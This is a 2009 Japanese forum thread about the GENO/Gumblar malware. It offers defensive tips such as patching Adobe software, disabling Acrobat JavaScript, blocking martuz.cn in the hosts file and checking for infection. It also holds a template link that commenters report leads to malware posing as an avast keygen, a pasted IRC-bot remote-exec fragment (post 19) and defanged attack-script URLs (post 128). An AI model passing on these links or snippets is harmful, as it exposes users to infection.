GENOウイルススレ ★22

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
2【注意喚起】GENOチェッカーはアフィリエイトです。【危険分子】:2009/06/22(月) 12:20:43
GENOウイルスチェッカー(アフィリエイトも充実)
tp://geno.2ch.tc/← アフィリエイト(Amazon) ↓ソース

<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに tp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる
3名無しさん@お腹いっぱい。:2009/06/22(月) 12:25:12
【関連スレ】

GENOウイルススレ 感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/

【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/

乙女&BL@【公式感染】GENOウイルス注意喚起スレ2
http://schiphol.2ch.net/test/read.cgi/ggirl/1242719888/

【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/
4名無しさん@お腹いっぱい。:2009/06/22(月) 13:41:32
     ___
   /|∧_∧|
   ||. (・ω・`| 次スレはここか
   ||oと.  U|
   || |(__)J|
   ||/彡 ̄ ガチャ
5名無しさん@お腹いっぱい。:2009/06/22(月) 13:43:09
重複

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/
6名無しさん@お腹いっぱい。:2009/06/22(月) 13:55:56
     ___
   /|∧_∧|
   ||. (   )| 部屋をまちがった
   ||oと.  U|
   || |(__)J|
   ||/彡 ̄ ササッ
7名無しさん@お腹いっぱい。:2009/06/22(月) 16:10:40
GENOウイルススレ ★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/
8名無しさん@お腹いっぱい。:2009/06/22(月) 19:36:53
9名無しさん@お腹いっぱい。:2009/06/22(月) 19:38:36
>>5
そのスレはテンプレ間違いすぎだし
早漏だから却下
10名無しさん@お腹いっぱい。:2009/06/22(月) 19:43:26
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
http://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
11名無しさん@お腹いっぱい。:2009/06/22(月) 19:44:35
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
  http://www.btfree.info/file.php?action-get.html
  Code by: 790e3cc3feabad9
12名無しさん@お腹いっぱい。:2009/06/22(月) 19:45:25
重複

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/
13名無しさん@お腹いっぱい。:2009/06/22(月) 19:57:05
>>12
現在の最新版は9.1.2です
何の根拠で9.1.1指定か
その表記なら常にバージョン書き換えるぐらいしてください
9.1.0でGENOは対策済みです

何で本体からアップデートさせない

javaScriptのみで完全安全ではありません

14名無しさん@お腹いっぱい。:2009/06/22(月) 19:59:35
15名無しさん@お腹いっぱい。:2009/06/22(月) 20:36:26
スパムの大部分は中国関連、米研究者が集計
http://www.itmedia.co.jp/enterprise/articles/0906/22/news017.html
16名無しさん@お腹いっぱい。:2009/06/22(月) 20:44:14
sega
17名無しさん@お腹いっぱい。:2009/06/22(月) 21:26:39
今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ(米セキュリティ企業公表)

http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
18名無しさん@お腹いっぱい。:2009/06/22(月) 21:29:51
バスターはスゴイ!
すごい
19名無しさん@お腹いっぱい。:2009/06/22(月) 21:56:53
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
20名無しさん@お腹いっぱい。:2009/06/22(月) 21:57:38
GENOウイルスだと思ってブロックしてみる!
http://tinyurl.com/2b94y2

※中身はJR東日本のHPです
21名無しさん@お腹いっぱい。:2009/06/22(月) 22:08:07
もういらなくね?
22名無しさん@お腹いっぱい。:2009/06/22(月) 22:15:03
そらそうよ
23名無しさん@お腹いっぱい。:2009/06/23(火) 00:12:27
アフィ中が
24名無しさん@お腹いっぱい。:2009/06/23(火) 02:04:33
ヨドバシのPC購入者の半分がウィルスに感染
http://tsushima.2ch.net/test/read.cgi/news/1245689548/
25名無しさん@お腹いっぱい。:2009/06/23(火) 02:07:57
ナにこれ
26名無しさん@お腹いっぱい。:2009/06/23(火) 02:12:20
>>11の3はコード入れてダウンロードすると
avastのプロフェッショナルバージョンのkeygenのRARファイルと
表示されるけど無料のavastでチェックしたらマルウェアと診断された・・

Virustotalで解析しても今日現在だと半分以上が黒と診断してる



27名無しさん@お腹いっぱい。:2009/06/23(火) 02:17:43
オフィシャル以外からのDLは危ないね
28名無しさん@お腹いっぱい。:2009/06/23(火) 04:01:08
失敗
29名無しさん@お腹いっぱい。:2009/06/23(火) 07:35:02
>19 よう〜
コード貼り付けるなよ
ノートンがぶろっくしてるじゃんボケ
30名無しさん@お腹いっぱい。:2009/06/23(火) 11:07:10
http://u9.getuploader.com/orz.gamemaster/download/11/gv3.jpg
Download Password: geno?
MD5: 4720e402afe7e098465a0a3c666cbf70
Size: 330.5 KB
-------------------------------------------------------
こんなの踏んでしまったんだが。おいらのPCは逝っちゃいますか?

Firefox3+NoScript使用
adobe flashは最新版を使用(versionは何処で見るのかわからん)
PG2+Kerio422+Avira 9で壁を立てている・・のに。
31名無しさん@お腹いっぱい。:2009/06/23(火) 11:47:41
>>30
http://www.gigabyte.co.jp内のフラッシュムービーが原因で
「ムービー内のスクリプトが原因で実行速度が遅くなっています」のエラーがでただけではないか
今ギガバイトサイトが落ちているけれど修復中か

Adobeサイト参照
http://www.adobe.com/jp/support/kb/ts/228/ts_228663_ja-jp.html
32名無しさん@お腹いっぱい。:2009/06/23(火) 15:50:53
>>30
見てほしくないようなので見ないけど
心配ならOS入れなおせば良いよ
33名無しさん@お腹いっぱい。:2009/06/24(水) 00:01:08
>>26
なんで無料で使えるアンチウィルスのkeygenを貼ってるんだろうな。
こんなあからさまに釣り臭いものを貼ったバカ、それをテンプレに入れたバカ、それを気づかずに貼るバカ、みんな消えてください。
34名無しさん@お腹いっぱい。:2009/06/24(水) 00:02:51
プロフェッショナルは無料じゃないからに決まってるだろ
35名無しさん@お腹いっぱい。:2009/06/24(水) 00:04:40
そこじゃなかったか
ごめん
36名無しさん@お腹いっぱい。:2009/06/24(水) 00:53:13
37名無しさん@お腹いっぱい。:2009/06/24(水) 02:09:33
Apacheて
38名無しさん@お腹いっぱい。:2009/06/24(水) 02:51:01
世の中の何割かのサイトを一気に落とせる脆弱性ですね
ってかおまいも/.が情報元かよ
39名無しさん@お腹いっぱい。:2009/06/24(水) 21:41:10
/.
40名無しさん@お腹いっぱい。:2009/06/25(木) 00:35:54
重複しねええええええええええええええええええ

セキュ板にゴミ増やすな糞
http://pc11.2ch.net/test/read.cgi/sec/1245402584/
41名無しさん@お腹いっぱい。:2009/06/25(木) 00:49:07
だまれ
42名無しさん@お腹いっぱい。:2009/06/25(木) 00:50:37
ここまで俺の自演
43名無しさん@お腹いっぱい。:2009/06/25(木) 04:46:09
自演ならしょうがない
44名無しさん@お腹いっぱい。:2009/06/25(木) 13:37:14
情強のニュー速民ならウィルスに感染した事なんかないよな                   .exe
http://tsushima.2ch.net/test/read.cgi/news/1245836922/l50
45名無しさん@お腹いっぱい。:2009/06/25(木) 14:10:52
>>44                                                    ↑w
ないよ
46名無しさん@お腹いっぱい。:2009/06/25(木) 18:05:49
Adobe Shockwaveに重大なセキュリティホール -- 数億人に影響
http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20395621,00.htm

一応アップデートしたほうがいいかも
47名無しさん@お腹いっぱい。:2009/06/25(木) 22:43:16
>>46
それ以前にインストールしてもインストール後の初回コンテンツ読み込みで、初期化中のまま止まるからどうしようもない。
AdobeはActiveXによる動的インストールを過信しすぎというか、安易に使って墓穴掘りすぎだと思うの
PDFリーダごときになぜActiveXを引っ張り出す。
48名無しさん@お腹いっぱい。:2009/06/26(金) 02:36:54
Shockwaveはいらん
49名無しさん@お腹いっぱい。:2009/06/26(金) 09:13:50
ウェブ経由のActiveX/VBScript/JavaScriptとリファラ転送はPFWで確実に拒否させているのでまったく気にならない。
50名無しさん@お腹いっぱい。:2009/06/26(金) 12:05:07
ほう
51名無しさん@お腹いっぱい。:2009/06/26(金) 12:43:25
ベンダーが対応してないころに過剰反応でクリーンインスコしたやつは負け組み?
結局実害なかったんでしょ
52名無しさん@お腹いっぱい。:2009/06/26(金) 14:14:31
実害無かったって誰が言ったの?
53名無しさん@お腹いっぱい。:2009/06/26(金) 17:45:20
こんなもん引っかかる時点で
54名無しさん@お腹いっぱい。:2009/06/26(金) 22:17:18
ド素人が偉そうだな
55名無しさん@お腹いっぱい。:2009/06/27(土) 00:08:24
>>49
XSS耐性が下がるのでリファラ転送は切らないほうが良い。
56名無しさん@お腹いっぱい。:2009/06/27(土) 00:20:54
>>54
やべぇ、2chにプロ登場しちゃったよ
57名無しさん@お腹いっぱい。:2009/06/27(土) 01:39:07
2chは自演のプロ集団
58名無しさん@お腹いっぱい。:2009/06/27(土) 01:42:04
>>52
GENO
59名無しさん@お腹いっぱい。:2009/06/27(土) 01:44:02
だからGENOウイルス
60名無しさん@お腹いっぱい。:2009/06/27(土) 02:41:53
61名無しさん@お腹いっぱい。:2009/06/27(土) 02:54:13
>>56
ド素人でもド素人を批判できる
お前日本語もド素人だな
62名無しさん@お腹いっぱい。:2009/06/27(土) 02:57:07
だれがド素人なん
63名無しさん@お腹いっぱい。:2009/06/27(土) 03:06:09
おれ様
64名無しさん@お腹いっぱい。:2009/06/27(土) 03:15:37
貴様ら何様のつもりだよ
65名無しさん@お腹いっぱい。:2009/06/27(土) 03:32:59
王子様
66名無しさん@お腹いっぱい。:2009/06/27(土) 07:58:42
逆さま
67名無しさん@お腹いっぱい。:2009/06/27(土) 08:09:17
さま
68名無しさん@お腹いっぱい。:2009/06/27(土) 08:16:45
まさ様
69名無しさん@お腹いっぱい。:2009/06/27(土) 09:55:32
じーさま
70名無しさん@お腹いっぱい。:2009/06/27(土) 11:29:07
GENOはしんだ
71名無しさん@お腹いっぱい。:2009/06/27(土) 12:50:14
貴様
72名無しさん@お腹いっぱい。:2009/06/27(土) 15:57:52
ヨン様
73名無しさん@お腹いっぱい。:2009/06/27(土) 16:11:25
お子様
74名無しさん@お腹いっぱい。:2009/06/27(土) 17:20:36
ランチ
75名無しさん@お腹いっぱい。:2009/06/27(土) 18:07:10
かしこ
76名無しさん@お腹いっぱい。:2009/06/27(土) 22:49:45
【社会】A4のコピー用紙が突然B5に変形
http://gimpo.2ch.net/test/read.cgi/news7/1244987217/
77名無しさん@お腹いっぱい。:2009/06/27(土) 22:59:13
ニュース [私のニュース] “目指せ3000000人釣り!part67”
78名無しさん@お腹いっぱい。:2009/06/27(土) 22:59:46
なにこの流れw
79名無しさん@お腹いっぱい。:2009/06/27(土) 23:42:48
GENOってる
80名無しさん@お腹いっぱい。:2009/06/28(日) 06:50:17
GENOGENO
81名無しさん@お腹いっぱい。:2009/06/28(日) 09:53:53
げのげの
82名無しさん@お腹いっぱい。:2009/06/28(日) 09:55:12
バスターだけど、
ニコ動大百科から横のカラムに並ぶ
お勧め動画に飛ぼうとするとブロックされるわ
なんかの記述がひっかかるんだろうね
83名無しさん@お腹いっぱい。:2009/06/28(日) 11:01:21
>>82
>>18

マジレスするとニコ動スレかバスタースレで聞いたほうが早い
ここでバスター関連の質問しても釣り認定されるだけ
84名無しさん@お腹いっぱい。:2009/06/28(日) 11:04:06
バスターもニコ動も使わないから違うかもしれんけど
ttp://bbs.nicovideo.jp/test/read.cgi/bugreport/1245475420/
85名無しさん@お腹いっぱい。:2009/06/28(日) 11:26:16
もう質問する奴もそれに答える奴も
みんなまとめて逝ってよし
86名無しさん@お腹いっぱい。:2009/06/28(日) 11:53:37
GENOの歌が歌えなくなりますもんね(笑)
87名無しさん@お腹いっぱい。:2009/06/28(日) 11:57:10
バスターはスゴイ!
すごい
88名無しさん@お腹いっぱい。:2009/06/28(日) 12:03:16
バスターバカにすんな
89名無しさん@お腹いっぱい。:2009/06/28(日) 12:49:50
GENOって何て読むの?
ジェノ?ゲノ?
90名無しさん@お腹いっぱい。:2009/06/28(日) 13:07:43
GENOさんに聞いてくださいな
91名無しさん@お腹いっぱい。:2009/06/28(日) 13:11:03
GENOのサイトにはジェノって載ってる
92名無しさん@お腹いっぱい。:2009/06/28(日) 13:13:54
だからGENOサイト
93名無しさん@お腹いっぱい。:2009/06/28(日) 13:39:46
下脳だよ
94名無しさん@お腹いっぱい。:2009/06/28(日) 13:45:07
じぇのじぇの
95名無しさん@お腹いっぱい。:2009/06/28(日) 14:24:33
ジェノだけどゲノウイルスとよんでもいいよ
96名無しさん@お腹いっぱい。:2009/06/28(日) 15:20:45
ショップ名はジェノ
ウイルス名はゲノ

これ豆な
97名無しさん@お腹いっぱい。:2009/06/28(日) 15:59:02
げのげの
98名無しさん@お腹いっぱい。:2009/06/28(日) 16:17:24
正式名称じゃなくて通称なんだから、どっちでもいいのでは?
99名無しさん@お腹いっぱい。:2009/06/28(日) 16:41:15
初めて知った時、ゲオに見えてゲオのブクマ消した俺がいるお(・ω・)
100名無しさん@お腹いっぱい。:2009/06/28(日) 16:58:35
GEOはゲームのゲオと別の会社で地図のジェオがあるんだね
やっぱり、どっちでもいい気がするお(AA略)
101名無しさん@お腹いっぱい。:2009/06/29(月) 06:23:32
じぇのげの
102名無しさん@お腹いっぱい。:2009/06/29(月) 08:46:21
ああなんか久しぶりにX68Kのジェノサイドやりたくなってきたww
103名無しさん@お腹いっぱい。:2009/06/30(火) 16:15:37
【連載】GENOの歩き方 (1) 激安パソコンやPCパーツ、周辺機器を通販でラクラク入手 | パソコン | マイコミジャーナル
http://journal.mycom.co.jp/series/geno/001/index.html
104名無しさん@お腹いっぱい。:2009/06/30(火) 16:16:22
GENOなら豊富な在庫をオンラインで自由に比較検討
「通販ショップGENO」は、デスクトップPC、液晶一体型PC、ノートパソコン、UMPC、Macintoshといったコンピューターをはじめとして、
PCパーツ、液晶モニタやプリンタ、NASなどの周辺機器、無線LANルータやハブなどのネットワーク機器にいたるまで、
非常に多彩なジャンルの商品を揃えている。商品は基本的に新品やアウトレット品が中心だが、
他社にはない良品中古のなどの商品も数多く販売されているのがユニークだ。
なお、各商品には商品名の頭に【新品】【良品中古】【リファビッシュ】などの記述がされているため、
例えば中古品には抵抗があるけれどリファビッシュならOKという場合もすぐにお目当ての商品が見つかるだろう。
105名無しさん@お腹いっぱい。:2009/06/30(火) 17:06:43
リファビッシュってかっこいいよね
106名無しさん@お腹いっぱい。:2009/06/30(火) 18:08:43
GENOさんキタ━━━━━━(゚∀゚)━━━━━━!!!!
107名無しさん@お腹いっぱい。:2009/06/30(火) 18:24:27
自分はGENO再度からの新参だから
GENO社に対しては特別なんのアレもないけど
>>103のリンクに、素敵な記述があったので引用させてもらおう
>賢い買い物において肝心なのは、商品の本質をキチンと見極められるかどうかなのだ。

利用者が各自、判断すればいいんじゃないの
勃発時からの住民の皆さんの意見は、また違うかもしれない
108名無しさん@お腹いっぱい。:2009/06/30(火) 19:47:16
109名無しさん@お腹いっぱい。:2009/07/02(木) 11:09:11
110名無しさん@お腹いっぱい。:2009/07/03(金) 23:55:30
結局GENOウィルス被害はもう終わりか
111名無しさん@お腹いっぱい。:2009/07/05(日) 11:32:41
結局さあ
このウイルスは何が危険なの??
お前らが勝手に騒いでるだけじゃん
112名無しさん@お腹いっぱい。:2009/07/05(日) 11:49:19
>>111
GENO店員乙
113名無しさん@お腹いっぱい。:2009/07/05(日) 12:06:00
>>111
お前か危険じゃないと思えば危険じゃないんじゃね?
よかったじゃん
114名無しさん@お腹いっぱい。:2009/07/05(日) 12:28:05
wikiwikiのエラーページにgenoウイルスってほんと?
115名無しさん@お腹いっぱい。:2009/07/05(日) 12:38:14
何今日なんか伸びてんな
こわい
116名無しさん@お腹いっぱい。:2009/07/05(日) 12:41:46
>>111
^^^^^^^;;;;;
117名無しさん@お腹いっぱい。:2009/07/05(日) 13:12:40
>>114
フラ板の某スレで、そんな書き込み見た
住民の人がカスペでスキャンして異常
なしだったみたいだから誤情報じゃない
118名無しさん@お腹いっぱい。:2009/07/05(日) 13:26:27
>>117
いや、誤情報じゃないね
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/703
703 名前:61[sage] 投稿日:2009/06/27(土) 09:45:04
>>699
AVIRA9 7.01.04.144
 fk.pdf - HTML/Shellcode.Gen
Kaspersky 2009/06/27 8:38:00
 fk.pdf -

Kaspersky提出済み。


fk.pdfの中身みるともろだわ

119名無しさん@お腹いっぱい。:2009/07/05(日) 13:29:39
>>114
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F403.html&hua=
※ 隠しスクリプトを発見しました。(1)
fk.pdf
120名無しさん@お腹いっぱい。:2009/07/05(日) 13:56:02
wikiwikiって結構利用者多いんじゃね?
まーたスレが10くらい進むぞw
121名無しさん@お腹いっぱい。:2009/07/05(日) 13:59:22
いわゆるGENOみたいに難読化されたjsでは無いね
もろ誘導じゃねーか。これなら対応しやすいんじゃないの
122名無しさん@お腹いっぱい。:2009/07/05(日) 14:02:48
>Asqlsodbc.chmのファイルサイズの確認を確認する
> ■Windows XP:
>  改ざんされていなければ
>  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes


これ日本語のOSのみ50,727 bytesって表記しとけよ
他言語のOSだと、感染してなくてもsqlsodbc.chmの容量が違う
123名無しさん@お腹いっぱい。:2009/07/05(日) 14:05:56
こっちは重複

↓本スレ
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/
124名無しさん@お腹いっぱい。:2009/07/05(日) 14:11:59
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

フイタ
125名無しさん@お腹いっぱい。:2009/07/05(日) 14:13:20
間違い探し

(オススメ度)(オススメ度)(オススメ度)
(オススメ度)(オススメ度)(オススメ度)
(オススメ度)(オススメ度)(オススメ度)
(オススメ度)(オススメ度)(オススメ度)
(オススメ度)(オススメ度)(オススメ度)
(オススメ度)(オススメ度)(オススメ度)
126名無しさん@お腹いっぱい。:2009/07/05(日) 16:12:44
>>123
そっちは無断スレ立て
前スレ500ぐらいで立てて落ちてもう一回立てたな
落ちるまでほっとけ
127名無しさん@お腹いっぱい。:2009/07/05(日) 16:14:11
あげあげなかんじで
128ぷぎゃー ◆DQNpgr/GXc :2009/07/05(日) 16:22:27
wikiwikiから不正コード削除確認
hXXp://0x6EA52967:888/jp.js
・・・とあと副産物↓
hXXp://1540341936:888/dir/dir.htm
129名無しさん@お腹いっぱい。:2009/07/05(日) 16:33:21
うぜぇ
130名無しさん@お腹いっぱい。:2009/07/05(日) 18:26:31
>>118
>>117です、スミマセン。訂正恐れ入ります
少なくともGENOではないのではと思ったのですが
GENOでしたか。自分が無知で浅はかでした
そのスレの方もカスペでスキャンしたわけでなく
自分の環境で問題なかったというだけでした
スレ名ぼかそうとFAKE入れて、かえって
住民の方に失礼になってしまいました
併せて お詫びいたします
131名無しさん@お腹いっぱい。:2009/07/05(日) 20:24:25
作った人間はもう捕まったのかねえ
132名無しさん@お腹いっぱい。:2009/07/06(月) 08:01:05
>>118
そのfk.PDFはGENO新種(亜種)みたい?

44 :(*‘ω‘ *)オンライン:2009/07/06(月) 07:33:34 ID:VmXw78Zk0
Adobe Rader 最新版9.1.2にしてるのに、
そのwikiのPDFウイルス食らって、ウイルスのexe本体感染しかけた・・・

wiki見てたらいきなりコマンドプロンプトが開いて、
アンチウイルスソフトがウイルス本体(exe)検出して削除。
ググったらウイルスexe自体は去年既出のやつだったので助かったがあぶねぇ。

Adobe Reader 9.1.2に脆弱性があるってことだよね。

47 :(*‘ω‘ *)オンライン:2009/07/06(月) 07:57:36 ID:VmXw78Zk0
>>46
いやAdobe Readerの環境設定のadobe scriptはoffにしてた。
それでも感染(exeのダウンロード開始)したんよ。
何がいいたかというと今度の脆弱性は
adobe reader9.1.2&adobe script offにしていても意味無い
新しいやつだねという話。

133名無しさん@お腹いっぱい。:2009/07/06(月) 08:14:06
PDF ExploitはみんなGENOなの?
亜種亜種って何を根拠に言ってたんだか
134名無しさん@お腹いっぱい。:2009/07/06(月) 08:18:21
ウイルスつうかpdfの中身みれば新種かどうかはわかるやつにはわかる。
そういうおまえさんこそ、何を根拠に言ってるの?
135名無しさん@お腹いっぱい。:2009/07/06(月) 08:24:40
(去年あたりから)アドビ製品のセキュリティ−ホールのやばさは異常
136名無しさん@お腹いっぱい。:2009/07/06(月) 08:26:46
137名無しさん@お腹いっぱい。:2009/07/06(月) 08:44:56
138名無しさん@お腹いっぱい。:2009/07/06(月) 09:47:06
GENOの定義わからん
139名無しさん@お腹いっぱい。:2009/07/06(月) 09:52:48
>>138
改竄サイトに置かれたjavascriptで攻撃サーバーに誘導しAdobe製品の脆弱性を突いて
ウィルスをダウンロードし感染させる攻撃のプロセスを持った一連のウイルス

通称 Gumblar/GENO
140名無しさん@お腹いっぱい。:2009/07/06(月) 12:25:45
Adobeしねよ
糞製品ばっか作りやがって
141名無しさん@お腹いっぱい。:2009/07/06(月) 14:51:53
Reader削除しちゃえばいい
142名無しさん@お腹いっぱい。:2009/07/06(月) 16:29:15
ここでの質問はスレチかな

Reader以外のpdf閲覧ツールなら大丈夫な理由は、Readerの脆弱性を突いてるからで
他の閲覧ツールなら問題のpdf開いても大丈夫ってことなんだよね。

もしAっていう閲覧ツールが、Readerの脆弱性のある機能?と同じ機能を持ってたら
当然Aで閲覧するのも危険なんだよね
143名無しさん@お腹いっぱい。:2009/07/06(月) 16:52:41
同じ機能にAdobeと同じ脆弱性があるかは分からない
実装が違えばない
144名無しさん@お腹いっぱい。:2009/07/06(月) 17:36:44
>>143
ありがとう。納得した。
145名無しさん@お腹いっぱい。:2009/07/06(月) 17:37:00
iframeも切っとけ
146名無しさん@お腹いっぱい。:2009/07/06(月) 22:54:28
reader削除(flashは有)してOSはVISAでUAC有効、ブラウザはopera(要設定)かfirefox(アドオン、設定必須)で比較的安全か
IEは8入れたらえらい事になったから通常用途では二度と使わない
2chブラウザのためにIE7は残しておく
147名無しさん@お腹いっぱい。:2009/07/06(月) 23:44:50
>>139
ご丁寧な解説ありがとうございます
検出名より感染プロセスで一括りに
されるということでしょうか
いずれにしろ大変 勉強になりました


148名無しさん@お腹いっぱい。:2009/07/07(火) 00:39:24
>>147
検出名は内部組成や亜種の生成ルートの推定から行われるもので、検出名はワクチンベンダの一存、系譜の根拠にするものではない
推定される亜種・模倣の系譜でGENOって呼んでるから、感染プロセスで適当に一括りしてるわけではない・・・はず

それに、132のレスのID:VmXw78Zk0の言い分を見るに、今までのGENOをカスタムして作られてるからこれも亜種
つっても、感染経路を拡張し、偽装方法を変更し、発症症状を変更し、踏み台を入れ替え、感染経路を新造して、亜種の亜種の亜種って続いてきただろうから、オリジナルの痕跡は残っていない可能性も有るけどな

しかし9.1.2+adobe script offでもやっぱり穴があったのか
案の定の結果だが渦中の本家に亜種としてゼロデイやられるとか、Adobe舐められ過ぎワロス
俺はOpera使いだからこそ気楽にプラグイン切り替えられるが、こんな変態ブラウザは一握りだし・・・
もうどうしようもない所まで来てるなぁ・・・
149名無しさん@お腹いっぱい。:2009/07/07(火) 02:22:17
>>148
Adobe以外の脆弱性もついてたみたいだからそっちかもしれないよ
150名無しさん@お腹いっぱい。:2009/07/07(火) 02:33:53
ウイルスに詳しい方が多いと思うので、教えてください

サイトが感染というよりも…
レンタルサーバー屋自体が、ウイルス感染したみたいなんです
(かなり有名なとこです)

これはGENOウイルスなのでしょうか?

上手く説明できないので…
詳しいことは、そのレンタルサーバーのスレッドを見て頂けたらと思います

正直、とても不安です

VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/
151名無しさん@お腹いっぱい。:2009/07/07(火) 03:29:18
>>150
はい同類です
wikiwikiはこれが原因だったようです

アンチウイルスが反応なしでもPCが不安定になったなど
心当たりがある場合はOSの入れなおし推奨
心配な場合も入れなおしどうぞ
152名無しさん@お腹いっぱい。:2009/07/07(火) 10:27:36
>>148
やり口は似ていても、その中で GENOの系譜を継ぐものと継がざるもの
ルーツなり経緯なりで明確ではないにしろ一線を画すということでしょうか
大元をたどれば、どこに行き着くかということかもしれませんが…。
自分のような一般の人にとっては危険なことには変わりありませんので
>>134の言うとおり >わかるやつにはわかる でいいのかもしれませんね
可否スレの方たちが新種・亜種・別物と分析なさってくれてますし

>>130
今そのレス見ると、カスペがユーザー使用環境で対応してるか
確認の依頼だったかもしれないですね。重ね重ね失礼しました

>>149
>Adobe以外の脆弱性
さっき、そのスレ見たら
>既知の(パッチ済みの)脆弱性
と誰かが書き込んでました
参照URlは「Microsoft Video ActiveX コントロールの脆弱性」のページでした
153名無しさん@お腹いっぱい。:2009/07/07(火) 10:39:37
1つはPDF等の脆弱性を突いたもの GENO亜種
1つはActiveXの脆弱性を突いたもの ゼロデイアタック
共通点はいずれも配布元が香港
154名無しさん@お腹いっぱい。:2009/07/07(火) 10:54:32
前に狩りがどうの正義がどうののスレ
見たことあるけど、それもつながってるの?
155名無しさん@お腹いっぱい。:2009/07/07(火) 11:13:24
